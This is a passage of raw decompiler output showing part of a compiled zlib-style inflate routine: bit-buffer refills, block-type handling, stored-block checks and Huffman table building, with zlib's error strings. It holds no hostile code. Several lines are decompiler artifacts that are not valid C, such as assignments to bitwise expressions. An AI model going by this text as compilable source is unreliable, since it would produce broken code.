                            														 *((intOrPtr*)( *(__edi + 0x24) + 0x30)) = 1;
                            													}
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													__eax = E01316CA0();
                            													__ecx =  *(__esp + 0x54);
                            													__esp = __esp + 0xc;
                            													__edx =  *(__esp + 0x10);
                            													 *(__edi + 0x1c) = __eax;
                            													 *(__ecx + 0x30) = __eax;
                            													 *(__edi + 4) = 0x3f3f;
                            													goto L178;
                            												} else {
                            													L133:
                            													__eflags = __esi - 0x10;
                            													if(__esi >= 0x10) {
                            														L136:
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														if(( *(__edi + 0xc) & 0x00000004) == 0) {
                            															L139:
                            															__ecx = 0;
                            															__esi = 0;
                            															__eflags = 0;
                            															 *(__esp + 0x10) = 0;
                            															goto L140;
                            														} else {
                            															L137:
                            															__eax =  *(__edi + 0x1c) & 0x0000ffff;
                            															__eflags = __edx - ( *(__edi + 0x1c) & 0x0000ffff);
                            															if(__edx == ( *(__edi + 0x1c) & 0x0000ffff)) {
                            																goto L139;
                            															} else {
                            																L138:
                            																__ecx =  *(__esp + 0x48);
                            																 *(__ecx + 0x18) = "header crc mismatch";
                            																 *(__edi + 4) = 0x3f51;
                            															}
                            														}
                            														goto L178;
                            													} else {
                            														while(1) {
                            															L134:
                            															__eflags = __ebp;
                            															if(__ebp == 0) {
                            																goto L102;
                            															}
                            															L135:
                            															__eax =  *__ebx & 0x000000ff;
                            															__ecx = __esi;
                            															__eax = ( *__ebx & 0x000000ff) << __cl;
                            															__ebx = __ebx + 1;
                            															__edx = __edx + __eax;
                            															 *(__esp + 0x14) = __ebx;
                            															__esi = __esi + 8;
                            															 *(__esp + 0x10) = __edx;
                            															__ebp = __ebp - 1;
                            															__eflags = __esi - 0x10;
                            															if(__esi < 0x10) {
                            																continue;
                            															} else {
                            																goto L136;
                            															}
                            															goto L362;
                            														}
                            														goto L102;
                            													}
                            												}
                            												goto L362;
                            											case 9:
                            												L143:
                            												__eflags = __esi - 0x20;
                            												if(__esi >= 0x20) {
                            													L147:
                            													__ecx = __edx;
                            													__edx = __edx << 0x10;
                            													__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
                            													__edx = __edx >> 8;
                            													__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                            													__eax = __edx >> 0x00000008 & 0x0000ff00;
                            													__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                            													__edx = __edx >> 0x18;
                            													__ecx =  *(__esp + 0x48);
                            													__eax = __eax + __edx;
                            													__edx = 0;
                            													 *(__edi + 0x1c) = __eax;
                            													 *(__esp + 0x10) = 0;
                            													__esi = 0;
                            													__eflags = 0;
                            													 *(__ecx + 0x30) = __eax;
                            													 *(__edi + 4) = 0x3f3e;
                            													goto L148;
                            												} else {
                            													L144:
                            													asm("o16 nop [eax+eax]");
                            													while(1) {
                            														L145:
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L102;
                            														}
                            														L146:
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 0x20;
                            														if(__esi < 0x20) {
                            															continue;
                            														} else {
                            															goto L147;
                            														}
                            														goto L362;
                            													}
                            													goto L102;
                            												}
                            												goto L362;
                            											case 0xa:
                            												L148:
                            												__eflags =  *(__edi + 0x10);
                            												if( *(__edi + 0x10) == 0) {
                            													L338:
                            													__eax =  *(__esp + 0x20);
                            													 *(__ecx + 0xc) =  *(__esp + 0x20);
                            													__eax =  *(__esp + 0x1c);
                            													 *(__ecx + 0x10) =  *(__esp + 0x1c);
                            													__eax = 2;
                            													 *__ecx = __ebx;
                            													 *(__ecx + 4) = __ebp;
                            													 *(__edi + 0x40) = __esi;
                            													_pop(__esi);
                            													_pop(__ebp);
                            													_pop(__ebx);
                            													 *(__edi + 0x3c) = __edx;
                            													_pop(__edi);
                            													__esp = __esp + 0x34;
                            													return 2;
                            												} else {
                            													L149:
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													__eax = L01316A20();
                            													__ecx =  *(__esp + 0x54);
                            													__esp = __esp + 0xc;
                            													__edx =  *(__esp + 0x10);
                            													 *(__edi + 0x1c) = __eax;
                            													 *(__ecx + 0x30) = __eax;
                            													 *(__edi + 4) = 0x3f3f;
                            													goto L150;
                            												}
                            												goto L362;
                            											case 0xb:
                            												L150:
                            												__eax =  *(__esp + 0x4c);
                            												__eflags = __eax - 5;
                            												if(__eax == 5) {
                            													L345:
                            													__edi =  *(__esp + 0x10);
                            													__edx = __eax;
                            													goto L104;
                            												} else {
                            													L151:
                            													__eflags = __eax - 6;
                            													if(__eax == 6) {
                            														goto L345;
                            													} else {
                            														goto L152;
                            													}
                            												}
                            												goto L362;
                            											case 0xc:
                            												L152:
                            												__eflags =  *(__edi + 8);
                            												if( *(__edi + 8) == 0) {
                            													L154:
                            													__eflags = __esi - 3;
                            													if(__esi >= 3) {
                            														L157:
                            														__eax = __edx;
                            														__edx = __edx >> 1;
                            														 *(__edi + 8) = __eax;
                            														__edx = __edx & 0x00000003;
                            														switch( *((intOrPtr*)((__edx & 0x00000003) * 4 +  &M013165DC))) {
                            															case 0:
                            																L158:
                            																 *(__edi + 4) = 0x3f41;
                            																goto L159;
                            															case 1:
                            																L160:
                            																__eflags =  *(__esp + 0x4c) - 6;
                            																 *((intOrPtr*)(__edi + 0x50)) = 0x1331a30;
                            																 *(__edi + 0x58) = 9;
                            																 *((intOrPtr*)(__edi + 0x54)) = 0x1332230;
                            																 *((intOrPtr*)(__edi + 0x5c)) = 5;
                            																 *(__edi + 4) = 0x3f47;
                            																if( *(__esp + 0x4c) != 6) {
                            																	L159:
                            																	__ecx =  *(__esp + 0x48);
                            																	__edx = __edx >> 2;
                            																	__esi = __esi - 3;
                            																	 *(__esp + 0x10) = __edx;
                            																	goto L178;
                            																} else {
                            																	L161:
                            																	__edx = __edx >> 2;
                            																	__esi = __esi - 3;
                            																	 *(__esp + 0x10) = __edx;
                            																	goto L102;
                            																}
                            																goto L362;
                            															case 2:
                            																L162:
                            																__ecx =  *(__esp + 0x48);
                            																__edx = __edx >> 2;
                            																__esi = __esi - 3;
                            																 *(__edi + 4) = 0x3f44;
                            																 *(__esp + 0x10) = __edx;
                            																goto L178;
                            															case 3:
                            																L163:
                            																__ecx =  *(__esp + 0x48);
                            																__edx = __edx >> 2;
                            																__esi = __esi - 3;
                            																 *(__esp + 0x10) = __edx;
                            																 *(__ecx + 0x18) = "invalid block type";
                            																 *(__edi + 4) = 0x3f51;
                            																goto L178;
                            														}
                            													} else {
                            														while(1) {
                            															L155:
                            															__eflags = __ebp;
                            															if(__ebp == 0) {
                            																goto L102;
                            															}
                            															L156:
                            															__eax =  *__ebx & 0x000000ff;
                            															__ecx = __esi;
                            															__eax = ( *__ebx & 0x000000ff) << __cl;
                            															__ebx = __ebx + 1;
                            															__edx = __edx + __eax;
                            															 *(__esp + 0x14) = __ebx;
                            															__esi = __esi + 8;
                            															 *(__esp + 0x10) = __edx;
                            															__ebp = __ebp - 1;
                            															__eflags = __esi - 3;
                            															if(__esi < 3) {
                            																continue;
                            															} else {
                            																goto L157;
                            															}
                            															goto L362;
                            														}
                            														goto L102;
                            													}
                            												} else {
                            													L153:
                            													__ecx = __esi;
                            													 *(__edi + 4) = 0x3f4e;
                            													__ecx = __esi & 0x00000007;
                            													__edx = __edx >> __cl;
                            													__esi = __esi - __ecx;
                            													 *(__esp + 0x10) = __edx;
                            													goto L177;
                            												}
                            												goto L362;
                            											case 0xd:
                            												L164:
                            												__esi = __esi & 0x00000007;
                            												__edx = __edx >> __cl;
                            												__esi = __esi - (__esi & 0x00000007);
                            												 *(__esp + 0x10) = __edx;
                            												__eflags = __esi - 0x20;
                            												if(__esi >= 0x20) {
                            													L168:
                            													__eax = __edx;
                            													__ecx = __dx & 0x0000ffff;
                            													 !__edx =  !__edx >> 0x10;
                            													__eflags = __ecx -  !__edx >> 0x10;
                            													if(__ecx ==  !__edx >> 0x10) {
                            														L170:
                            														__edx = 0;
                            														 *(__edi + 0x44) = __ecx;
                            														__esi = 0;
                            														 *(__esp + 0x10) = 0;
                            														__eflags =  *(__esp + 0x4c) - 6;
                            														 *(__edi + 4) = 0x3f42;
                            														if( *(__esp + 0x4c) == 6) {
                            															L344:
                            															__edi = 0;
                            															goto L103;
                            														} else {
                            															L171:
                            															__ecx =  *(__esp + 0x48);
                            															goto L172;
                            														}
                            													} else {
                            														L169:
                            														__ecx =  *(__esp + 0x48);
                            														 *(__ecx + 0x18) = "invalid stored block lengths";
                            														 *(__edi + 4) = 0x3f51;
                            														goto L178;
                            													}
                            												} else {
                            													L165:
                            													while(1) {
                            														L166:
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L102;
                            														}
                            														L167:
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 0x20;
                            														if(__esi < 0x20) {
                            															continue;
                            														} else {
                            															goto L168;
                            														}
                            														goto L362;
                            													}
                            													goto L102;
                            												}
                            												goto L362;
                            											case 0xe:
                            												L172:
                            												 *(__edi + 4) = 0x3f43;
                            												goto L173;
                            											case 0xf:
                            												L173:
                            												__eax =  *(__edi + 0x44);
                            												__eflags = __eax;
                            												if(__eax == 0) {
                            													L180:
                            													 *(__edi + 4) = 0x3f3f;
                            													goto L178;
                            												} else {
                            													L174:
                            													__eflags = __eax - __ebp;
                            													__eax = (__eax > __ebp) ? __ebp : __eax;
                            													__eflags = __eax -  *(__esp + 0x1c);
                            													__eax = (__eax >  *(__esp + 0x1c)) ?  *(__esp + 0x1c) : __eax;
                            													 *(__esp + 0x34) = __eax;
                            													__eflags = __eax;
                            													if(__eax == 0) {
                            														goto L102;
                            													} else {
                            														L175:
                            														__eax = E013189A0( *(__esp + 0x28), __ebx, __eax);
                            														__eax =  *(__esp + 0x40);
                            														 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
                            														__ebx = __ebx + __eax;
                            														 *(__esp + 0x20) =  *(__esp + 0x20) + __eax;
                            														__ebp = __ebp - __eax;
                            														_t333 = __edi + 0x44;
                            														 *_t333 =  *(__edi + 0x44) - __eax;
                            														__eflags =  *_t333;
                            														 *(__esp + 0x14) = __ebx;
                            														goto L176;
                            													}
                            												}
                            												goto L362;
                            											case 0x10:
                            												goto L0;
                            											case 0x11:
                            												goto L187;
                            											case 0x12:
                            												L200:
                            												__eflags =  *(_t1151 + 0x6c) -  *((intOrPtr*)(_t1151 + 0x68)) +  *((intOrPtr*)(_t1151 + 0x64));
                            												if( *(_t1151 + 0x6c) >=  *((intOrPtr*)(_t1151 + 0x68)) +  *((intOrPtr*)(_t1151 + 0x64))) {
                            													L235:
                            													__eflags =  *(_t1151 + 4) - 0x3f51;
                            													if( *(_t1151 + 4) == 0x3f51) {
                            														L176:
                            														_t1103 =  *(_t1192 + 0x10);
                            														goto L177;
                            													} else {
                            														L236:
                            														__eflags =  *((short*)(_t1151 + 0x274));
                            														if( *((short*)(_t1151 + 0x274)) != 0) {
                            															L239:
                            															_t838 = _t1151 + 0x534;
                            															 *(_t1151 + 0x58) = 9;
                            															 *(_t1151 + 0x50) = _t838;
                            															 *(_t1151 + 0x70) = _t838;
                            															_t841 = E01316F90(1, _t1151 + 0x74,  *((intOrPtr*)(_t1151 + 0x64)), _t1151 + 0x70, _t1151 + 0x58, _t1151 + 0x2f4);
                            															_t1192 = _t1192 + 0x18;
                            															 *(_t1192 + 0x2c) = _t841;
                            															__eflags = _t841;
                            															if(_t841 == 0) {
                            																L241:
                            																 *(_t1151 + 0x54) =  *(_t1151 + 0x70);
                            																 *(_t1151 + 0x5c) = 6;
                            																_t847 = E01316F90(2, _t1151 + ( *((intOrPtr*)(_t1151 + 0x64)) + 0x3a) * 2,  *((intOrPtr*)(_t1151 + 0x68)), _t1151 + 0x70, _t1151 + 0x5c, _t1151 + 0x2f4);
                            																_t1192 = _t1192 + 0x18;
                            																 *(_t1192 + 0x2c) = _t847;
                            																__eflags = _t847;
                            																if(_t847 == 0) {
                            																	L243:
                            																	_t1108 =  *((intOrPtr*)(_t1192 + 0x4c));
                            																	 *(_t1151 + 4) = 0x3f47;
                            																	__eflags = _t1108 - 6;
                            																	if(_t1108 == 6) {
                            																		L343:
                            																		_t1152 =  *(_t1192 + 0x10);
                            																		goto L104;
                            																	} else {
                            																		L244:
                            																		_t1118 =  *(_t1192 + 0x10);
                            																		_t999 =  *(_t1192 + 0x48);
                            																		goto L245;
                            																	}
                            																} else {
                            																	L242:
                            																	_t982 =  *(_t1192 + 0x48);
                            																	_t1103 =  *(_t1192 + 0x10);
                            																	_t982[6] = "invalid distances set";
                            																	 *(_t1151 + 4) = 0x3f51;
                            																	goto L178;
                            																}
                            															} else {
                            																L240:
                            																_t982 =  *(_t1192 + 0x48);
                            																_t1103 =  *(_t1192 + 0x10);
                            																_t982[6] = "invalid literal/lengths set";
                            																 *(_t1151 + 4) = 0x3f51;
                            																goto L178;
                            															}
                            														} else {
                            															L237:
                            															_t982 =  *(_t1192 + 0x48);
                            															_t1103 =  *(_t1192 + 0x10);
                            															_t982[6] = "invalid code -- missing end-of-block";
                            															 *(_t1151 + 4) = 0x3f51;
                            															goto L178;
                            														}
                            													}
                            												} else {
                            													L201:
                            													_t1152 =  *(_t1192 + 0x10);
                            													do {
                            														L202:
                            														_t916 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1192 + 0x24)) + 0x50)) + ((0x00000001 <<  *( *(_t1192 + 0x3c))) - 0x00000001 & _t1152) * 4);
                            														 *(_t1192 + 0x34) = _t916;
                            														__eflags = (_t916 >> 0x00000008 & 0x000000ff) - _t1179;
                            														if((_t916 >> 0x00000008 & 0x000000ff) <= _t1179) {
                            															L206:
                            															_t1138 = _t916 >> 0x10;
                            															__eflags = _t1138 - 0x10;
                            															if(__eflags >= 0) {
                            																L208:
                            																if(__eflags != 0) {
                            																	L215:
                            																	__eflags =  *(_t1192 + 0x36) - 0x11;
                            																	_t1139 =  *(_t1192 + 0x10);
                            																	_t1080 = _t916 & 0x000000ff;
                            																	if( *(_t1192 + 0x36) != 0x11) {
                            																		L222:
                            																		_t1177 = _t1080 + 7;
                            																		 *(_t1192 + 0x34) = _t1080;
                            																		__eflags = _t1179 - _t1177;
                            																		if(_t1179 >= _t1177) {
                            																			L227:
                            																			_t1140 = _t1139 >> _t1080;
                            																			_t1103 = _t1140 >> 7;
                            																			__eflags = _t1103;
                            																			 *(_t1192 + 0x30) = (_t1140 & 0x0000007f) + 0xb;
                            																			_t920 = 0xfffffff9;
                            																			goto L228;
                            																		} else {
                            																			L223:
                            																			while(1) {
                            																				L224:
                            																				__eflags = _t1185;
                            																				if(_t1185 == 0) {
                            																					goto L102;
                            																				}
                            																				L225:
                            																				_t929 = ( *_t954 & 0x000000ff) << _t1179;
                            																				_t954 =  &(_t954[1]);
                            																				_t1139 = _t1139 + _t929;
                            																				 *(_t1192 + 0x14) = _t954;
                            																				_t1179 = _t1179 + 8;
                            																				 *(_t1192 + 0x10) = _t1139;
                            																				_t1185 = _t1185 - 1;
                            																				__eflags = _t1179 - _t1177;
                            																				if(_t1179 < _t1177) {
                            																					continue;
                            																				} else {
                            																					L226:
                            																					_t1080 =  *(_t1192 + 0x34);
                            																					goto L227;
                            																				}
                            																				goto L362;
                            																			}
                            																			goto L102;
                            																		}
                            																	} else {
                            																		L216:
                            																		_t1178 = _t1080 + 3;
                            																		 *(_t1192 + 0x34) = _t1080;
                            																		__eflags = _t1179 - _t1178;
                            																		if(_t1179 >= _t1178) {
                            																			L221:
                            																			_t1143 = _t1139 >> _t1080;
                            																			_t1103 = _t1143 >> 3;
                            																			 *(_t1192 + 0x30) = (_t1143 & 0x00000007) + 3;
                            																			_t920 = 0xfffffffd;
                            																			L228:
                            																			_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
                            																			_t1179 = _t1179 + _t920 - _t1080;
                            																			__eflags = _t1179;
                            																			 *(_t1192 + 0x34) = 0;
                            																			goto L229;
                            																		} else {
                            																			L217:
                            																			while(1) {
                            																				L218:
                            																				__eflags = _t1185;
                            																				if(_t1185 == 0) {
                            																					goto L102;
                            																				}
                            																				L219:
                            																				_t934 = ( *_t954 & 0x000000ff) << _t1179;
                            																				_t954 =  &(_t954[1]);
                            																				_t1139 = _t1139 + _t934;
                            																				 *(_t1192 + 0x14) = _t954;
                            																				_t1179 = _t1179 + 8;
                            																				 *(_t1192 + 0x10) = _t1139;
                            																				_t1185 = _t1185 - 1;
                            																				__eflags = _t1179 - _t1178;
                            																				if(_t1179 < _t1178) {
                            																					continue;
                            																				} else {
                            																					L220:
                            																					_t1080 =  *(_t1192 + 0x34);
                            																					goto L221;
                            																				}
                            																				goto L362;
                            																			}
                            																			goto L102;
                            																		}
                            																	}
                            																} else {
                            																	L209:
                            																	_t1090 = (_t916 >> 0x00000008 & 0x000000ff) + 2;
                            																	 *(_t1192 + 0x34) = _t1090;
                            																	__eflags = _t1179 - _t1090;
                            																	if(_t1179 >= _t1090) {
                            																		L213:
                            																		_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
                            																		_t1091 = _t916 & 0x000000ff;
                            																		_t1103 =  *(_t1192 + 0x10) >> _t1091;
                            																		_t1179 = _t1179 - _t1091;
                            																		_t935 =  *(_t1151 + 0x6c);
                            																		 *(_t1192 + 0x10) = _t1103;
                            																		__eflags = _t935;
                            																		if(_t935 == 0) {
                            																			L238:
                            																			_t982 =  *(_t1192 + 0x48);
                            																			_t982[6] = "invalid bit length repeat";
                            																			 *(_t1151 + 4) = 0x3f51;
                            																			goto L178;
                            																		} else {
                            																			L214:
                            																			 *(_t1192 + 0x34) =  *(_t1151 + 0x72 + _t935 * 2) & 0x0000ffff;
                            																			_t938 = _t1103 & 0x00000003;
                            																			_t1103 = _t1103 >> 2;
                            																			_t1179 = _t1179 - 2;
                            																			 *(_t1192 + 0x30) = _t938 + 3;
                            																			L229:
                            																			 *(_t1192 + 0x10) = _t1103;
                            																			__eflags =  *(_t1151 + 0x6c) +  *(_t1192 + 0x30) -  *((intOrPtr*)(_t1151 + 0x68)) +  *((intOrPtr*)(_t1151 + 0x64));
                            																			if( *(_t1151 + 0x6c) +  *(_t1192 + 0x30) >  *((intOrPtr*)(_t1151 + 0x68)) +  *((intOrPtr*)(_t1151 + 0x64))) {
                            																				goto L238;
                            																			} else {
                            																				L230:
                            																				_t1083 =  *(_t1192 + 0x30);
                            																				_t1141 =  *(_t1192 + 0x34);
                            																				do {
                            																					L231:
                            																					 *(_t1151 + 0x74 +  *(_t1151 + 0x6c) * 2) = _t1141;
                            																					 *(_t1151 + 0x6c) =  *(_t1151 + 0x6c) + 1;
                            																					_t925 =  *(_t1151 + 0x6c);
                            																					 *(_t1192 + 0x34) = _t925;
                            																					_t1083 = _t1083 - 1;
                            																					__eflags = _t1083;
                            																				} while (_t1083 != 0);
                            																				_t1152 =  *(_t1192 + 0x10);
                            																				_t1142 = _t925;
                            																				_t1084 =  *((intOrPtr*)(_t1192 + 0x24));
                            																				goto L233;
                            																			}
                            																		}
                            																	} else {
                            																		L210:
                            																		while(1) {
                            																			L211:
                            																			__eflags = _t1185;
                            																			if(_t1185 == 0) {
                            																				goto L103;
                            																			}
                            																			L212:
                            																			_t1146 = ( *_t954 & 0x000000ff) << _t1179;
                            																			_t954 =  &(_t954[1]);
                            																			_t1152 = _t1152 + _t1146;
                            																			 *(_t1192 + 0x14) = _t954;
                            																			_t1179 = _t1179 + 8;
                            																			 *(_t1192 + 0x10) = _t1152;
                            																			_t1185 = _t1185 - 1;
                            																			__eflags = _t1179 -  *(_t1192 + 0x34);
                            																			if(_t1179 <  *(_t1192 + 0x34)) {
                            																				continue;
                            																			} else {
                            																				goto L213;
                            																			}
                            																			goto L362;
                            																		}
                            																		goto L103;
                            																	}
                            																}
                            															} else {
                            																L207:
                            																_t1093 = _t916 >> 0x00000008 & 0x000000ff;
                            																_t1152 = _t1152 >> _t1093;
                            																_t1179 = _t1179 - _t1093;
                            																_t1084 =  *((intOrPtr*)(_t1192 + 0x24));
                            																 *(_t1192 + 0x10) = _t1152;
                            																 *(_t1084 + 0x74 +  *(_t1084 + 0x6c) * 2) = _t1138;
                            																 *(_t1084 + 0x6c) =  *(_t1084 + 0x6c) + 1;
                            																_t1142 =  *(_t1084 + 0x6c);
                            																goto L233;
                            															}
                            														} else {
                            															L203:
                            															while(1) {
                            																L204:
                            																__eflags = _t1185;
                            																if(_t1185 == 0) {
                            																	goto L103;
                            																}
                            																L205:
                            																_t1152 = _t1152 + (( *_t954 & 0x000000ff) << _t1179);
                            																_t954 =  &(_t954[1]);
                            																_t1179 = _t1179 + 8;
                            																_t1185 = _t1185 - 1;
                            																 *(_t1192 + 0x10) = _t1152;
                            																 *(_t1192 + 0x14) = _t954;
                            																_t916 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1192 + 0x24)) + 0x50)) + ((0x00000001 <<  *( *(_t1192 + 0x3c))) - 0x00000001 & _t1152) * 4);
                            																 *(_t1192 + 0x34) = _t916;
                            																__eflags = (_t916 >> 0x00000008 & 0x000000ff) - _t1179;
                            																if((_t916 >> 0x00000008 & 0x000000ff) > _t1179) {
                            																	continue;
                            																} else {
                            																	goto L206;
                            																}
                            																goto L362;
                            															}
                            															goto L103;
                            														}
                            														goto L362;
                            														L233:
                            														__eflags = _t1142 -  *((intOrPtr*)(_t1084 + 0x68)) +  *((intOrPtr*)(_t1084 + 0x64));
                            													} while (_t1142 <  *((intOrPtr*)(_t1084 + 0x68)) +  *((intOrPtr*)(_t1084 + 0x64)));
                            													_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
                            													goto L235;
                            												}
                            												goto L362;
                            											case 0x13:
                            												L245:
                            												 *(_t1151 + 4) = 0x3f48;
                            												goto L246;
                            											case 0x14:
                            												L246:
                            												__eflags = _t1185 - 6;
                            												if(_t1185 < 6) {
                            													L250:
                            													 *(_t1192 + 0x30) =  *(_t1151 + 0x50);
                            													 *(_t1151 + 0x1bc8) = 0;
                            													_t853 =  *( *(_t1151 + 0x50) + ((0x00000001 <<  *(_t1151 + 0x58)) - 0x00000001 & _t1118) * 4);
                            													__eflags = 0xad - _t1179;
                            													if(0xad <= _t1179) {
                            														L254:
                            														__eflags = _t853;
                            														if(_t853 == 0) {
                            															L261:
                            															_t1007 = _t853 >> 0x00000008 & 0x000000ff;
                            															 *(_t1151 + 0x1bc8) =  *(_t1151 + 0x1bc8) + _t1007;
                            															_t1179 = _t1179 - _t1007;
                            															_t1103 = _t1118 >> _t1007;
                            															 *(_t1192 + 0x10) = _t1103;
                            															 *(_t1151 + 0x44) = _t853 >> 0x10;
                            															__eflags = _t853;
                            															if(_t853 != 0) {
                            																L263:
                            																__eflags = _t853 & 0x00000020;
                            																if((_t853 & 0x00000020) == 0) {
                            																	L265:
                            																	__eflags = _t853 & 0x00000040;
                            																	if((_t853 & 0x00000040) == 0) {
                            																		L267:
                            																		_t855 = _t853 & 0xf;
                            																		__eflags = _t855;
                            																		 *(_t1151 + 4) = 0x3f49;
                            																		 *(_t1151 + 0x4c) = _t855;
                            																		goto L268;
                            																	} else {
                            																		L266:
                            																		_t982 =  *(_t1192 + 0x48);
                            																		_t982[6] = "invalid literal/length code";
                            																		 *(_t1151 + 4) = 0x3f51;
                            																		goto L178;
                            																	}
                            																} else {
                            																	L264:
                            																	 *(_t1151 + 0x1bc8) = 0xffffffff;
                            																	 *(_t1151 + 4) = 0x3f3f;
                            																	goto L177;
                            																}
                            															} else {
                            																L262:
                            																 *(_t1151 + 4) = 0x3f4d;
                            																goto L177;
                            															}
                            														} else {
                            															L255:
                            															__eflags = _t853 & 0x000000f0;
                            															if((_t853 & 0x000000f0) != 0) {
                            																goto L261;
                            															} else {
                            																L256:
                            																_t1053 = _t853 >> 8;
                            																_t1126 = _t853;
                            																 *(_t1192 + 0x40) = _t1053;
                            																 *(_t1192 + 0x34) = _t1126;
                            																_t853 =  *( *(_t1192 + 0x30) + ((((0x00000001 << (_t853 & 0x000000ff) + (_t1053 & 0x000000ff)) - 0x00000001 &  *(_t1192 + 0x10)) >> (_t1053 & 0x000000ff)) + (_t853 >> 0x10)) * 4);
                            																__eflags = (_t853 >> 0x00000008 & 0x000000ff) + ( *(_t1192 + 0x40) & 0x000000ff) - _t1179;
                            																if((_t853 >> 0x00000008 & 0x000000ff) + ( *(_t1192 + 0x40) & 0x000000ff) <= _t1179) {
                            																	L260:
                            																	_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
                            																	_t954 =  *(_t1192 + 0x14);
                            																	_t1062 = _t1126 & 0x000000ff;
                            																	_t1118 =  *(_t1192 + 0x10) >> _t1062;
                            																	_t1179 = _t1179 - _t1062;
                            																	__eflags = _t1179;
                            																	 *(_t1151 + 0x1bc8) = _t1062;
                            																	goto L261;
                            																} else {
                            																	L257:
                            																	while(1) {
                            																		L258:
                            																		__eflags = _t1185;
                            																		if(_t1185 == 0) {
                            																			goto L102;
                            																		}
                            																		L259:
                            																		_t979 =  *(_t1192 + 0x14);
                            																		_t1063 = _t1179;
                            																		_t1179 = _t1179 + 8;
                            																		_t1185 = _t1185 - 1;
                            																		 *(_t1192 + 0x10) =  *(_t1192 + 0x10) + (( *_t979 & 0x000000ff) << _t1063);
                            																		 *(_t1192 + 0x14) =  &(_t979[1]);
                            																		_t981 = _t1126 & 0x000000ff;
                            																		_t853 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1192 + 0x24)) + 0x50)) + ((((0x00000001 << (_t1126 & 0x000000ff) + _t981) - 0x00000001 &  *(_t1192 + 0x10)) >> _t981) + ( *(_t1192 + 0x36) & 0x0000ffff)) * 4);
                            																		__eflags = (_t853 >> 0x00000008 & 0x000000ff) + _t981 - _t1179;
                            																		if((_t853 >> 0x00000008 & 0x000000ff) + _t981 > _t1179) {
                            																			continue;
                            																		} else {
                            																			goto L260;
                            																		}
                            																		goto L362;
                            																	}
                            																	goto L102;
                            																}
                            															}
                            														}
                            													} else {
                            														L251:
                            														while(1) {
                            															L252:
                            															__eflags = _t1185;
                            															if(_t1185 == 0) {
                            																goto L102;
                            															}
                            															L253:
                            															_t906 = ( *_t954 & 0x000000ff) << _t1179;
                            															_t954 =  &(_t954[1]);
                            															_t1179 = _t1179 + 8;
                            															 *(_t1192 + 0x10) = _t1118 + _t906;
                            															_t1185 = _t1185 - 1;
                            															 *(_t1192 + 0x14) = _t954;
                            															_t853 =  *( *(_t1151 + 0x50) + ((0x00000001 <<  *(_t1151 + 0x58)) - 0x00000001 &  *(_t1192 + 0x10)) * 4);
                            															_t1118 =  *(_t1192 + 0x10);
                            															__eflags = (_t853 >> 0x00000008 & 0x000000ff) - _t1179;
                            															if((_t853 >> 0x00000008 & 0x000000ff) > _t1179) {
                            																continue;
                            															} else {
                            																goto L254;
                            															}
                            															goto L362;
                            														}
                            														goto L102;
                            													}
                            												} else {
                            													L247:
                            													__eflags =  *(_t1192 + 0x1c) - 0x102;
                            													if( *(_t1192 + 0x1c) < 0x102) {
                            														goto L250;
                            													} else {
                            														L248:
                            														_push( *((intOrPtr*)(_t1192 + 0x28)));
                            														_t999[3] =  *(_t1192 + 0x20);
                            														_t999[4] =  *(_t1192 + 0x20);
                            														 *_t999 = _t954;
                            														_t999[1] = _t1185;
                            														_push(_t999);
                            														 *(_t1151 + 0x3c) = _t1118;
                            														 *(_t1151 + 0x40) = _t1179;
                            														E01317440();
                            														_t982 =  *(_t1192 + 0x50);
                            														_t1192 = _t1192 + 8;
                            														__eflags =  *(_t1151 + 4) - 0x3f3f;
                            														_t1103 =  *(_t1151 + 0x3c);
                            														_t1179 =  *(_t1151 + 0x40);
                            														_t954 =  *_t982;
                            														_t1185 = _t982[1];
                            														 *(_t1192 + 0x20) = _t982[3];
                            														 *(_t1192 + 0x1c) = _t982[4];
                            														 *(_t1192 + 0x14) = _t954;
                            														 *(_t1192 + 0x10) = _t1103;
                            														if( *(_t1151 + 4) == 0x3f3f) {
                            															 *(_t1151 + 0x1bc8) = 0xffffffff;
                            														}
                            														goto L178;
                            													}
                            												}
                            												goto L362;
                            											case 0x15:
                            												L268:
                            												_t1010 =  *(_t1151 + 0x4c);
                            												__eflags = _t1010;
                            												if(_t1010 == 0) {
                            													L274:
                            													 *(_t1151 + 0x1bcc) =  *(_t1151 + 0x44);
                            													 *(_t1151 + 4) = 0x3f4a;
                            													goto L275;
                            												} else {
                            													L269:
                            													__eflags = _t1179 - _t1010;
                            													if(_t1179 >= _t1010) {
                            														L273:
                            														_t1179 = _t1179 - _t1010;
                            														_t896 = (0x00000001 << _t1010) - 0x00000001 & _t1103;
                            														_t1103 = _t1103 >> _t1010;
                            														 *(_t1151 + 0x44) =  *(_t1151 + 0x44) + _t896;
                            														_t590 = _t1151 + 0x1bc8;
                            														 *_t590 =  *(_t1151 + 0x1bc8) + _t1010;
                            														__eflags =  *_t590;
                            														 *(_t1192 + 0x10) = _t1103;
                            														goto L274;
                            													} else {
                            														L270:
                            														while(1) {
                            															L271:
                            															__eflags = _t1185;
                            															if(_t1185 == 0) {
                            																goto L102;
                            															}
                            															L272:
